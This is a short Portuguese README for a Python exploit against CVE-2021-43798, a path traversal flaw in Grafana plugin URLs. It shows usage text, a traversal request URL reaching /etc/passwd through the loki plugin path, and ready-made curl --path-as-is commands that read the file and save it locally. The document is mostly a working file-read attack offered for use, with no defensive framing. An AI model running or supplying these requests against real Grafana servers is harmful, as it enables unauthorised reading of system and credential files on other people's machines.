
Exploit em Python para CVE-2021-43798, uma vulnerabilidade de path traversal no Grafana que permite leitura arbitrária de arquivos via traversal de diretório em URLs de plugins.
uso: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: erro: os seguintes argumentos são obrigatórios: -H/--host
exemplo: python3 grafana-exploit.py --host <target_host>
se a leitura de arquivo arbitrário for bem-sucedida mostra a URL da requisição e o comando curl
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
então se você quiser baixar o arquivo, execute como acima
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd